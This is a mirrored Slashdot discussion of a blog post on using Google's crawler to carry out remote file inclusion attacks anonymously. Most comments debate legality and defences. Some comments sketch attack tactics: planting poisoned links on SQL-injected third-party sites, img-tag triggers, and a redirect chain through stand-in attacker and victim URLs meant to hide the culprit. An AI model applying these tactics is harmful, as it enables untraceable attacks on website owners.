Slashdot Mirror

← Back to Stories (view on slashdot.org)

Anonymizing RFI Attacks Through Google

Posted by ryuzaki0 on from the anonymizing-isn't-in-my-spellchecker dept.

netbuzz writes "Noam Rathaus on his SecuriTeam blog describes a technique by which 'Google can be utilized to hack into websites — actively exploiting them (not information gathering by the use of "Google hacking," although that is how most of the sites vulnerable to RFI attacks are found).' He cites examples in the wild and even mentions that the technique could be used as a 'covert' communications channel."

66 comments

  1. but is it a crime... by Sensor · · Score: 5, Interesting

    There is actually quite an interesting aside to this, would someone who used this technique actually be guilty of hacking? Afterall they don't run the exploit and arguably can't guarentee that anyone will.

    If I happen to create a utility capable of cracking a site but then store it for research, never distribute and never actively use then I've not committed a crime. If I distribute it to other researchers in good faith then I'm covered - at present its only the person who actively uses it that is guilty of a crime.

    However, in this scenario (even if I could be traced) its arguable that *I* never attacked a site, all I did was to place a tool that could be used in that way in a public location. I'm not sure that would completely stand up given the recent ammendment to the UKs computer misuse act (i.e. reasonable belief that the tool would not be used in that fashion), but still...

    As always it comes down to people...

    PS:
    Aas an aside I am currently running a survey for my MSc dissertation on IT admin access to confidential information. If you'd like to help out (and would like a shot at winning a £25 or $40 amazon voucher) then please take a look at:

    https://msc-survery.priogenus.com/amazon.php

    1. Re:but is it a crime... by MartinJW · · Score: 2, Interesting

      I'm not so sure. The intent is there to commit the crime, and it's safe to assume that once the attack has taken place, the malicious user will be utilising the now open security hole for further ends. I guess it's a bit like getting a friend to kill someone - you would still be guilty of murder - wouldn't you?

    2. Re:but is it a crime... by Sensor · · Score: 0, Offtopic

      sorry typo in URL:

      https://msc-survey.priogenus.com/amazon.php

    3. Re:but is it a crime... by Sensor · · Score: 2, Interesting

      Technically "conspiracy to murder", but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion... and someone then read your diary and chose to act upon it?

    4. Re:but is it a crime... by MartinJW · · Score: 1

      But you are not leaving a note on 'how it can be done'. You are putting a cyanide tablet in your grandmas teapot so that she pops off the vicar next time he calls.

    5. Re:but is it a crime... by Not_Wiggins · · Score: 2, Insightful

      but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion...

      I'll preface this by saying IANAL...
      Prove? No. Provide circumstancial evidence? Yup.

      As the grandparent stated, the real judgment behind this crime is one of intent. The nature of these links is so specific, targeted and intentional, that even if one didn't get accused of willful attacking, he'd be guilty of negligence.

      Maybe it doesn't seem as clear-cut because we're "just talking about words."

      But the web provides action to words, real things that can happen based on materials produced. So, if we put the question within a different context, maybe the "crime" part becomes more apparent:

      How you you feel about a nuclear materials researcher leaving weapons grade plutonium in an unlocked box in his back yard while posting a notice in the local paper that such material exists unprotected for anyone to harvest? Would he be making the bomb himself and destroying people with it? No. Would it be tantamount to such an act? Yes.

      I don't know how it would be prosecuted, but there's no doubt that it would be.

      I think the reason there's even question of legality to these types of attacks isn't because the moral implications are ambiguous, but because the law hasn't been able to keep up with the latest in cybercrime.

      --
      Diplomacy is the art of saying, "Nice doggie!" until you can find a rock.
    6. Re:but is it a crime... by Sensor · · Score: 1

      as someone who's father actually is a vicar I can see how that would be a problem (although they do drink less tea than you might expect).

      But I'm still not sure I agree, it might be equivalent to choosing to store your own rat poison in your own teapot in a flat that you didnt lock.... I'm certainly not saying its morally ok, but its probably closer to reckless endangerment than anything else.

    7. Re:but is it a crime... by Anonymous Coward · · Score: 0

      Psst... you forgot the midlands in your survey.

    8. Re:but is it a crime... by Opie812 · · Score: 2, Funny

      as someone who's father actually is a vicar...

      Are you new to slashdot? The proper way to phrase this....ummmm...phrase is as follows:

      My father's a vicar you insensitive clod!

      :)

      --
      I'm not a nerd. Nerds are smart.
    9. Re:but is it a crime... by mysticgoat · · Score: 1

      However, in this scenario (even if I could be traced) its arguable that *I* never attacked a site, all I did was to place a tool that could be used in that way in a public location.

      IANAL, but it seems to me that there is a long history of "public nuisance" and "reckless endangerment" in common law that could be applied here (at least in countries like the UK and the USA whose legal systems are grounded on common law).

      At present, if you created such a link and I discovered your link was accessable from within my municipality, I could petition my local court to fine you rather heavily for creating a public nuisance that recklessly endangers the legitimate business interests of the city, and require you to fix the site. This is commonly used for controlling things like uncapped wells that put toddlers at risk, fire hazards of various kinds, and so on, and is usually one of the more easily accessable court actions.

      So far as I know, this use of municiple courts to control internet misbehavior has not yet been attempted, but I don't think there is anything to prevent that. It might take a while to find judges with the vision to understand the issues and the gumption to take on these cases, but there are a lot of different jurisdictions where these complaints could be filed. I'm not sure how issues of jurisdiction and the effects of negative publicity would play out, but it would be interesting to see what might happen. In essence, rather than trying to create a new big club to beat the intarweb miscreants into line, we'd be protecting our tubes with the threat of being nibbled to death by ducks.

    10. Re:but is it a crime... by Ruff_ilb · · Score: 1

      I, for one, welcome our new Vicar overlords.

      --
      http://www.TheGamerNation.com/Forums
  2. Anonymous? by tttonyyy · · Score: 3, Informative

    Aside from triggering the attack, how does this make it anonymous?

    Surely the "http://URI-with-malicious-code.php" section will still create logs on the victim server pointing to the source of the malicious code (but perhaps not who triggered it).

    --
    biopowered.co.uk - catalytically cracking triglycerides for home automotive use since 2008. Just say no to big oil!
    1. Re:Anonymous? by Zedrick · · Score: 3, Informative

      Yes, but the URI-with-malicious-code is usually something like: http://www.geocities.com/xxxxxxx/xxx.txt

      At least that's what I usually see every time I check the logs of a website I'm going to shut down for allowing foreign includes (to be run).

    2. Re:Anonymous? by kestasjk · · Score: 1

      Exactly; you can use linkto:mysite.com to find who has been linking to you. Hardly makes finding your attacker any harder; why not just use Tor, go to an internet cafe, or go wardriving?

      This seems like something clever and pointless just for the sake of it.

      --
      // MD_Update(&m,buf,j);
    3. Re:Anonymous? by Mike89 · · Score: 1
      Exactly; you can use linkto:mysite.com to find who has been linking to you
      I don't know about anyone else, but this doesnt actually work for my site.. on closer inspection, it doesn't work on my friends URL either.. hell, it doesn't work for Slashdot either!
      http://www.google.com/search?q=linkto%3Aslashdot.o rg
    4. Re:Anonymous? by ArsenneLupin · · Score: 1
      Surely the "http://URI-with-malicious-code.php" section will still create logs on the victim server pointing to the source of the malicious code

      Nope, googlebot doesn't fill in the referer :-(

      However, it's not anonymous either. You can bet that if the victim server's admin understands how this was done, he will have no problem getting the relevant data from google's log, and there goes your little scheme!

      So, this trick should never be used "on its own". It's still useful however, and here's how:
      Don't put these poisoned link on any of your own servers. Instead, first SQL-rape an unrelated third party web site (via a proxy, just to be careful), and leave your doctored link there. Now, whenever google visits that page (or, anybody else follows the link, for that matter...), your real target will be SQL-raped!

      And it needn't to be google either: put your doctored link as an <img src=, and now just any visitor to that doctored page will do the dirty deed. The victim webmaster will see people from all over the world come in and go apeshit over his server. With a little bit of luck, the customer will just throw his hands up in the air, and take his business to a provider who uses Linux...

    5. Re:Anonymous? by Umbrae · · Score: 1

      That's because it's not linkto, it's link:

      http://www.google.com/search?as_lq=slashdot.org&bt nG=Search

    6. Re:Anonymous? by Anonymous Coward · · Score: 0

      One of the reasons why this is more dangerous than a straight-forward attack is that many sites give Googlebot elevated privileges. The right user agent from the right IP range can often access pages which normally require authentication, so that the pages can be found with Google but aren't accessible without paying or registering (you can suppress the Google cache for these pages).

      Another problem is that it's a time-delayed attack. Quick freeze and short data retention times don't work when the act of placing the link and the observable attack are separated by days or even weeks.

  3. change behaviour for bots by cucucu · · Score: 4, Informative

    In your server, you can code the logic to take another action if the user agent is a bot.
    Here you have a db of web robots.

    1. Re:change behaviour for bots by Anonymous Coward · · Score: 1, Interesting

      If you do that, prepare to be delisted from search engines or at least severely downranked. Showing different pages to bots than to regular clients is called cloaking and, since it is a technique primarily used to spam search engines, the major search engines test for cloaking and punish it. Technically a page is addressed by the URL, cookies, user agent, referrer and other pieces of request information, but search engines expect that you deliver the same main content for the same URL, all other request data be damned.

    2. Re:change behaviour for bots by LiquidCoooled · · Score: 1

      No, you should not have to change your site.
      Excluding google usually causes more issues (especially when management chirp up and say why aren't we being indexed).

      This is a problem between google and the destination site.
      Google are the ones here that are not verifying the URLs and attempting to use bad links.

      The destination site should be using the best web server they can which is known to handle these kind of problems properly.
      The web is broken in so many ways, google should have a good idea which are well formatted URLs and which may lead to problems.
      A link could be posted anywhere which the google bot will try to index.
      If its a corrupted entry it should be dropped before testing.

      --
      liqbase :: faster than paper
    3. Re:change behaviour for bots by kimvette · · Score: 1
      Google are the ones here that are not verifying the URLs and attempting to use bad links.


      Googlebot presumes all provided links are good until it touches each one and sees the response header. If a 200 or 302 comes back, obviously it's a valid URL handled by the server. Whether the target of that URL is malicious or not is not really for Google to determine; all they do is crawl linked and submitted sites via an automated process. The responsibility is shared between Microsoft and the server admin to ensure that Windows patches are released and properly installed, respectively.
      --
      The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
  4. In reality... by lpiob · · Score: 2, Insightful

    It's a feature, not a bug.

  5. Reminds me of this post by epsalon · · Score: 1

    The Spider of Doom at The Daily WTF.

    --

    Make even shorter URLs - 8LN.org

  6. RFI by kevin_conaway · · Score: 1

    Could someone define the RFI acronym? Neither the summary, article or google can explain it clearly.

    1. Re:RFI by Anonymous Coward · · Score: 2, Informative

      Nice explanation here.

    2. Re:RFI by Loconut1389 · · Score: 1

      I always think of Radio Frequency Interference, but oh well. As defined above, Remote File Inclusion.

    3. Re:RFI by Anonymous Coward · · Score: 0

      Radio-Frequency Interference. HTH!

    4. Re:RFI by that+this+is+not+und · · Score: 1

      RFI is a prominent acronymn in the technical community. It means, as you say, Radio Frequency Interference. Apparently, though, it's a cool sounding acronym that some other circle decided to latch onto it. I strongly doubt it will EVER mean 'Remote File Inclusion' outside a narrow subculture, however.

    5. Re:RFI by Loconut1389 · · Score: 1

      Off the top of my head, I couldn't think of another way to say remote file inclusion any better- so I at least grant that they seem to have a valid overlapping use for the acronym.

    6. Re:RFI by nacturation · · Score: 1

      Off the top of my head, I couldn't think of another way to say remote file inclusion any better- so I at least grant that they seem to have a valid overlapping use for the acronym.

      It's a pretty good acronym if you actually are discussing including files. However, this attack is like me linking to http://site.com/database.php?hack-in-querystring which has nothing to do with including remote files. Both bots and humans could follow that link and "attack" the site.

      --
      Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
    7. Re:RFI by that+this+is+not+und · · Score: 1

      True, but when I read 'RFI Attacks' I automatically assumed it was somebody interfering with some form of wireless communications. So long as they want to use an acronym that obscures meaning. Oh, wait... it's a narrow subculture we're talking about here....

      (nothing wrong with narrow subcultures, btw. nerds of any flavor are okay most times)

  7. How not Who by MartinJW · · Score: 5, Informative

    If your web application is vulnerable to attack then I would have thought it makes no difference where that attack comes from - be it a 'real' person or a search bot. You should spend more time worrying about whether your application is secure, the how is more important than the who.

    1. Re:How not Who by Anonymous Coward · · Score: 0

      This is oOOOOLLLDDDD

    2. Re:How not Who by deryckh · · Score: 2, Interesting

      Agreed. The problem I have with these sorts of things is they act as if the problem is with Google. It's not (or any other search engine for that matter). The problem is with the site that is vulnerable. Fix the security hole and there's nothing to worry about.

  8. ----- Wrong URL above ----- by Sensor · · Score: 0, Offtopic

    sorry... the url above should read:

    https://msc-survey.priogenus.com/amazon.php

  9. Remote File Inclusion by Bogtha · · Score: 4, Informative

    Remote File Inclusion. It's a pretty poor term for this type of attack, because it's not the act of inclusion that causes the problem, it's the act of requesting the file in the first place.

    --
    Bogtha Bogtha Bogtha
    1. Re:Remote File Inclusion by shoolz · · Score: 1

      Actually, it's a perfectly good name for the attack, since the request causes a .PHP file hosted on a remote server to be included and subsequently run. Perhaps a hyphen might help those who are hung up on it: "Remote-File Inclusion".

      Here's an example of an RFI attack designed to exploit a bit of sloppy coding in PHP Nuke.

  10. RFI? How about defining this? by Ashtead · · Score: 5, Informative

    Radio Frequency Interference? Request for Information? Radio France Internationale? Rodent Fangs Implementation? WHAT?

    How about explaining what such an ambigious acronym actually means initially. As neither TFA nor the summary seems to have done so, I therefore will have do it here, just to make heads and tails of the rest of the discussion and perhaps illuminate someone else. Hit Google, slog through a pile of links indicating one of the above, or some company whose name includes the three letters. There are many of these. On Page 3 I found the Wikipedia page for this TLA, on which there is a dead link to what this must be: Remote File Inclusion.

    How about that.

    I was wondering if it was just me, that I had been off-line for too long (like 2 days) and missed out on the latest and greatest buzzword, again?

    --
    SIGBUS @ NO-07.308
    1. Re:RFI? How about defining this? by MartinJW · · Score: 1

      I guess it is a result of the rush to submit an article first, thus a frantic cut-and-paste job pulls the TLA out of the context in which TFA was posted, where it probably made perfect sense.

    2. Re:RFI? How about defining this? by owlnation · · Score: 1

      how about Really F***ing Irritating?

    3. Re:RFI? How about defining this? by Anonymous Coward · · Score: 0

      Hello. If you hadn't noticed, this is the internet. You're allowed to say 'fuck' here.

    4. Re:RFI? How about defining this? by Anonymous Coward · · Score: 0

      OK, so WTF is TLA?

    5. Re:RFI? How about defining this? by hey! · · Score: 3, Informative

      I'm guessing from the text of the article it is Remote File Inclusion.

      The description of the mechanism doesn't really makes sense. If you can exploit a victim site by feeding it an evil URL in a form parameter, why use Google at all? You've lost anonymity by including the URL.

      Looking at the described effects, it sounds like what they do is feed google some malicious code wrapped up in something that looks like a URL on the victim site. Then Google spiders the URL, placing malicious content in the form parameters.

      So, suppose you have a malicious SQL injection attack that causes your database dump the password table to a remote database. The trick is that you get Google to launch the attack for you. You have the malicious code obfuscate the destination, and it isn't clear skullduggery is going on by casual inspection of the logs. It won't show up in the database logs either because its not a transaction.

      --
      Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
    6. Re:RFI? How about defining this? by Anonymous Coward · · Score: 0

      It's not only you.

    7. Re:RFI? How about defining this? by Fatalis · · Score: 2, Funny

      Yes, WTF is a TLA.

      --
      Deus est fatalis
    8. Re:RFI? How about defining this? by ladadadada · · Score: 1

      Strangely enough, the anonymity and the remote file inclusion are not the only issues here. I recently discovered Yahoo's Slurp running these sorts of queries (they were parameters to a search page) on several different sites that we host. The "attacker" had realised that we use the same code across several sites and could use exactly the same "exploit".

      The interesting part was that the goal of the "attacker" was not to run an exploit against our machines but to attempt to inject a link into the page that Yahoo would then index and would increase the pagerank of the target of the link. The targets of the links all seemed to be Google Adsense spam pages. The "attacker" was basically using our reasonably good pagerank to increase his.

      The easiest solution we found was to disallow spiders from crawling search results pages as they should be able to find all of our pages by following links on the site and shouldn't need to use the search. There's probably a down side to this approach but it seems to work so far.

      --
      Sig matters not. Judge me by my sig, do you?
  11. Simple solution by vivekg · · Score: 4, Interesting

    Seriously, I hate to read article like this one. They don't offer any solution.....this kind of attacks are not new at all, you can find tons of such attacks from access.log file/p> tail -f /var/log/httpd/access.log

    First get rid of fat apache and use like small and secure lighttpd if you are running a *small personal* web site. Second put lighttpd / Apache in chrooted jail and no one can install *php/perl* shell. I have documented the procedure for putting lighttpd in jail:

    http://www.cyberciti.biz/tips/howto-setup-lighttpd -php-mysql-chrooted-jail.html

    Both yahoo and google runs entire webserver in chrooted jail. Other choice is use OpenBSD which runs Apache in chrooted jail out of box.

    --
    The important thing is not to stop questioning --Albert Einstein.
    1. Re:Simple solution by AlXtreme · · Score: 1
      Don't think that you're safe in your chroot'ed jail. If your website for example uses mod_php and you run an old package of Mambo, then you will be exploited despite your jail.

      Yes, you are correct that such a setup will save you from certain attacks, however this isn't an alternative for proper, secure coding. Besides, anyone still using system() via a webserver (be it Apache or LightTPD) should be shot, regardless.

      --
      This sig is intentionally left blank
    2. Re:Simple solution by nacturation · · Score: 1

      Don't think that you're safe in your chroot'ed jail. If your website for example uses mod_php and you run an old package of Mambo, then you will be exploited despite your jail.

      How so? You'll also need to install the PHP libs and old Mambo package inside the jail and run as non-root. Are you saying that PHP+Mambo can break outside a chrooted jail in OpenBSD? Worst case, they hack the jail but your base system hasn't been compromised.

      --
      Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
  12. Old news by Anonymous Coward · · Score: 0
    Dave Korn just pointed out on Full Disclosure:

    Gadi Evron wrote:
    > > Noam Rathaus on using Google to anonymize attacks on websites:
    > > http://blogs.securiteam.com/index.php/archives/746

    > > By placing a URL on any web page, Google will find it, visit it and
    > > then index it. With this mechanism, it is possible to anonymize
    > > attacks on third party web sites through Google by the use of its
    > > crawler.

    This technique was described by Michal Zalewski in Phrack years ago.

    http://www.phrack.org/archives/57/p57-0x13

    cheers,
    DaveK
    --
    Can't think of a witty .sigline today....
    Firefox users: paste into your URL bar: "google site:neohapsis archive Full Disclosure" (assuming you've a smart keyword search set up for google - I much prefer em to the smart search bar - but I digress)
  13. don't need google by cucucu · · Score: 1

    Who needs google? There is always that ./ mob willing to click through any url without giving a second thought, no matter how long the way and how worthless its end.

    1. Re:don't need google by TheLink · · Score: 1

      Heh I was expecting goatse.cx

      Anyway you can turn on the preview feature for tinyurl - so it displays the url first without taking you straight to it. I recommend that.

      But the other url shortening services may not have such a feature.

      Anyway, if you do the attack mentioned in the article it might be a good idea to use tinyurl or other similar sites, so that it is google and friends that expand the resulting url, so it is harder for the victim to figure out who hosted the original shortened url - since they only have to expanded url to work with. Unless perhaps google sends the url of the referring page?

      I'm not sure if Google will display/store the resulting url from a 302 redirect or it will display/store the original url which could look very harmless and changed to be harmless AFTER the attack has occurred.

      e.g.

      The whenever something tries to access http://attackers.website/myphotos/
      They get a list of thumbnails, one which loads:
      http://intermediate.website/images/thumbnail.gif
      Which 302 redirects to http://victims.website/buggycgi?param=payload&boom

      But the second time round everyone just gets a thumbnail pic.

      So it will be hard to prove who was the culprit.

      BTW there are plenty of other things you can do with url shortening services. Many of these allow you to add stuff to the end of the urls which will be readded after the url is expanded!

      For example: http://tinyurl.com/8hw would take you to slashdot and

      http://tinyurl.com/8hw/my/logout would log you out from slashdot.

      You can use this feature for sites that require you to submit urls that end with a jpg or gif - e.g. avatar image or something like that.

      I leave it as an exercise to the reader to figure out more stuff they can do with such things... ;)

      --
  14. Nothing new by radu.stanca · · Score: 0, Redundant

    This was done years ago

  15. Glasshouses... by ArsenneLupin · · Score: 2, Informative

    ... The Daily WTF runs on ASPX. These are bold people. Very bold people.

  16. In Soviet Russia - with a twist by davidwr · · Score: 1

    In Soviet Russia, Google Hacks ...

    I c-can't do it. *sob*. This is too easy. It's like taking candy from a baby. I'm sorry.

    [walks away]

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
  17. No news... But this is... by Anonymous Coward · · Score: 0

    While I consider the URL in the article not containing
    any news the content of the following URL which is
    linked from within the comments was news to me

    http://blog.php-security.org/archives/49-Google-Re quest-Forgeries.html

  18. Against the System: Rise of the Robots by lazy321 · · Score: 1

    Check http://www.phrack.org/archives/57/p57-0x13 by Michal Zalewski from 2001

  19. Prior art by Beryllium+Sphere(tm) · · Score: 1

    This was described in Zalewski's _Silence On The Wire_.

  20. It's not "HACKING WITH GOOGLE" it's using google by itz2000 · · Score: 1

    It's not "HACKING WITH GOOGLE" it's using google to exploit vulnerabilities via the search
    In the particular example it's searching in the code where's cmd.gif to use it to enable malicious via remote site.

    It's not like using google to hack a specific site but just those who are vulnerable site (it's like searching for which site has phpbb2.6 and to use known exploits to "hack it" [with sql injuction or something).

    This discovery is for script kiddies, not for real hackers who wants to hack a specific site (unlike script kiddies that mostly would like to "hack" any site they can, no matter which one, only to show off to their friends or them self in case they don't have any).
    Cheers.

  21. Covert communications channel? by pipingguy · · Score: 1

    Couldn't the gibberish (designed to defeat filters) contained in spam also be a "Covert communications channel"?

  22. I studied this 3 years ago by mrkitty · · Score: 1

    I started doing this a few years ago. Check out the link below and view source. I got the data from over a year however it is a few years old. I was studying which engines could be abused in the 'best way'. Short answer, all of them.... http://web.archive.org/web/20030426184220/http://w ww.cgisecurity.com/

    --
    Believe me, if I started murdering people, there would be none of you left.
  23. no - doesn't require searching. by tendays · · Score: 1

    rtfa again - this *is* used for targetting specific sites. Google is used as an anonymiser.

    The article suggests searching cmd.gif to demonstrate that that method is being used, and indeed some of the results show that google's index carries urls containing attacks.

    To inject those urls into google's index the attacker doesn't even need to run a search or even contact google a single time - he puts the attack (mentioning the specific host the attacker wants to attack) on some webpage and then waits for google to find it and run the attack.

    Then, optionally, using google's cache, the attacker could go check the result of his attack.

  24. In Other News by RAMMS+EIN · · Score: 1

    In other news, vulnerabilities in your application can be exploited not just by the cracker, but also by an agent working for the cracker.

    Remember, you heard it here first!

    --
    Please correct me if I got my facts wrong.